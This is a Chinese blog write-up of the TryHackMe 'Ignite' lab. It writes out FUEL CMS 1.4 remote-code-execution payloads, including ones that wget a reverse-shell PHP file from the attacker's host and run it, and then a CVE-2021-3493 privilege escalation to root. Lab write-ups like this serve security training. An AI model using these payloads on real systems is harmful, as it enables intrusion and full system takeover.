TryHackMe-Ignite

已于 2023-01-15 14:24:13 修改
阅读量167 收藏
点赞数
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: 网络安全 安全 web安全
于 2022-12-22 10:40:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128405567
版权

Ignite

循例 nmap

只开80,直接访问,好家伙 FUEL CMS 1.4

之前某道题做过,存在rce的

searchsploit FUEL CMS

exploit:

view-source:http://10.10.115.191/fuel/pages/select/?filter='%2bpi(print(%24a%3d'system'))%2b%24a('whoami')%2b'

结果回显在网页源代码

尝试直接反弹shell,各种payload都不行

打算通过http将reverseshell的payload上传过去,再直接运行

攻击机创建好payload并打开http

python3 -m http.server

‘%2bpi(print(%24a%3d’system’))%2b%24a(‘wget http://10.11.17.14:8000/my_exp/rev_she11.php’)%2b’

‘%2bpi(print(%24a%3d’system’))%2b%24a(‘php ./rev_she11.php’)%2b’

成功getshell

进去后查看系统版本为ubuntu 16.04且gcc命令正常,尝试CVE-2021-3943

www-data@ubuntu:/var/www/html$ gcc -o ./getroot ./CVE-2021-3493_overlay_fs_ubuntu_14~04_and_16~04_and_18~04_and_20~04_LTS.c

www-data@ubuntu:/var/www/html$ chmod 777 ./getroot
chmod 777 ./getroot
www-data@ubuntu:/var/www/html$ ./getroot
./getroot
bash-4.3# whoami
whoami
root

游戏结束

我看了一下别人的writeup,别人是通过fuel的database.php获得root的密码

感觉我这个有点非预期,谁让这个cve这么猛呢,简直是通杀般的存在

Sugobet
关注
专栏目录
vulnhub靶场PHINEAS: 1实战记录
aoke79的博客
08-09 1436
vulnhub靶场PHINEAS: 1实战记录
tryhackme--Ignite
qq_45414878的博客
11-15 223
tryhackmeIgnite 用nmap扫描 nmap -T4 -sS -sV 10.10.214.254 -sC 发现CMS及版本 搜索本地漏洞库,发现一个远程代码执行漏洞,不要问我为什么不选sql的,系统命令执行和数据库那个香自己掂量 查看脚本里面的payload用法 修改一下paylaod,执行查看源码 %27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"id"%2
【Pytorch编程】Pytorch-Ignite v0.4.8的安装以及简单使用
陈艺荣
03-22 2855
Pytorch-Ignite v0.4.8的安装以及简单实用
pytorch高级库pytorch-ignite
热门推荐
weixin_43162240的博客
03-27 2万+
Pytorch 高级库Pytorch-Ignite的使用  8行代码训练模型,2行代码搞定pytorch训练的进度条。  这个库训练模型时,比较简洁,不需要写一大堆前向传播,后向传播等代码,代码更干净,逻辑更清晰。甚至进度条的调用也封装好了,可以自定义跟随进度条变化的字段,比如loss,准确率等,比写tqdm还要简单,进度条如下。 安装  这里用清华源安装,一般用pip安装时使用国内源速度飞快,...
Cosmos 基础 -- Ignite CLI(一)
chinusyan的专栏
01-18 2685
Ignite 基础
PyTorch-Ignite的介绍与快速上手
第欧根尼的酒桶的博客
02-29 901
这篇文章是对 PyTorch-Ignite 的全面介绍,旨在向深度学习爱好者、专业人士和研究人员展示 PyTorch-Ignite 的核心优势和功能。PyTorch-Ignite 与 PyTorch 保持一致的设计理念,致力于保持简单性、灵活性和可扩展性,同时确保高效性和可伸缩性。在本教程中,我们将通过构建和评估一个简单的 MNIST 分类器来阐述 PyTorch-Ignite 的基本概念,这是一个理想的入门案例。我们假设读者已经具备 PyTorch 的基础知识。
Apache-Ignite入门实战之一
kongxx的专栏
12-26 1万+
Apache-Ignite入门实战之一简介Apache Ignite 内存数据组织框架是一个高性能、集成化和分布式的内存计算和事务平台,用于大规模的数据集处理,比传统的基于磁盘或闪存的技术具有更高的性能,同时他还为应用和不同的数据源之间提供高性能、分布式内存中数据组织管理的功能。安装从 https://ignite.apache.org/download.cgi#binaries 下载最新的安装包,
tryhackmeIgnite writeup
2301_77295404的博客
08-03 259
首先用nmap -A 扫描目标(我忘了截图),可以看到它的80端口是开放的,它还扫描到了子目录fuel。打开网址,发现主页显示它使用了fuel cms, 于是在exploit-db 上搜索到它的漏洞和利用方法。搜先用locate database.php来定位它,在database.php中可以看到它的账号密码,于是尝试用这个密码登录root。开启一个http server,用于下载刚生成的shell。首先使用msfvenom生成一个反弹shell,如下(又忘了截图)使用下面的代码获取交互shell。
apache-ignite-2.8.0-src.zip
06-15
在"apache-ignite-2.8.0-src.zip"这个压缩包中,你将找到Apache Ignite 2.8.0版本的源代码,这将帮助你深入理解其内部工作原理,进行定制化开发或优化性能。源码注释是了解代码逻辑的关键,它会帮助开发者快速定位和...
finAPI-primeiro-projecto-ignite-nodejs:FinAPI - Ignite 的第一个项目 - Rocketseat <3
08-05
在这个名为"finAPI-primeiro-projecto-ignite-nodejs"的项目中,我们看到的是一个使用Node.js和JavaScript开发的初始应用,这是Rocketseat的Ignite训练营中的第一个项目。Ignite是由Rocketseat提供的一个强化学习...
Python库 | pytorch-ignite-0.4.0.dev20200504.tar.gz
04-14
资源分类:Python库 所属语言:Python 资源全名:pytorch-ignite-0.4.0.dev20200504.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
spring-boot-ignite:展示如何将apache ignite与spring boot集成,以及使用持久性内存功能和sql查询来覆盖内存缓存中的ign的案例
01-29
Spring Boot与Apache Ignite的集成及其持久的内存和基于缓存的sql查询 展示如何将apache ignite与spring boot集成在一起,以及使用持久性内存功能和sql查询来覆盖内存缓存中的ign的案例 将Spring Boot与Apache ...
Python-Ignite是一个高级库帮助你在PyTorch中训练神经网络
08-11
在提供的压缩包文件"pytorch-ignite-38a4f37"中,可能包含了Ignite库的源码或者示例项目,你可以通过查看和运行这些代码来进一步了解和掌握如何在实践中使用Ignite进行PyTorch的神经网络训练。 总之,Python-Ignite...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8463
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
AI在医学领域:医学AI的安全与隐私全面概述
声纹感知 洞察芯声
09-12 1478
本文通过系统化地检查医疗应用领域并为未来的攻击研究奠定基础,提供一个医疗领域AI攻击研究的全面视角。
WAAP解决方案:守护数字时代的安全盾牌
最新发布
dexunyun的博客
09-18 684
WAAP,即Web应用程序与API保护,是一种综合性的多层防护解决方案。它旨在通过强化认证、加密机制以及集成多种安全防护手段,如API安全Web攻击防护、全站隔离、漏洞扫描和流量清洗等,为企业的Web应用程序和API提供全方位的安全保障。WAAP不仅能够有效防御常见的网络攻击,如跨站脚本(XSS)、跨站请求伪造(CSRF)和SQL注入等,还能应对更为复杂的DDoS攻击和API接口滥用等高级威胁。
网络安全入门教程(非常详细)从零基础入门到精通
2301_77160226的博客
09-11 1511
网络安全是一个非常重要的领地,随着互联网的普及和信息化程度的不断提升,网络安全的重要性也越来越凸显,在日常生活和日常中保护个人信息和隐私,提高安全意识,不随意识泄露敏感信息和密码。对想要从网络安全工作的人来说,需要具备扎实的计算机和错误基础和安全性掌握最新的技术和工具,不断提高防护范围和应对能力。
重塑在线软件开发新纪元:集成高效安全特性,深度解析与评估支持浏览器在线编程的系统架构设计
帅次的博客
09-13 1795
本文深入探讨了为在线软件开发系统设计的架构方案,重点强调支持浏览器在线编程的高效性与安全性。通过对比分析管道-过滤器与仓库架构风格,并结合质量属性效用树进行评估,旨在构建出既满足用户需求又具备高可扩展性和卓越处理性能的系统架构,为开发者提供流畅的在线编程体验。
python-ignite
12-08
Python-Ignite是一个基于PyTorch的高级库,旨在帮助训练神经网络。它提供了许多实用程序和类,可以简化训练和评估过程。以下是一个简单的例子,演示如何使用Python-Ignite训练一个简单的神经网络: ```python ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值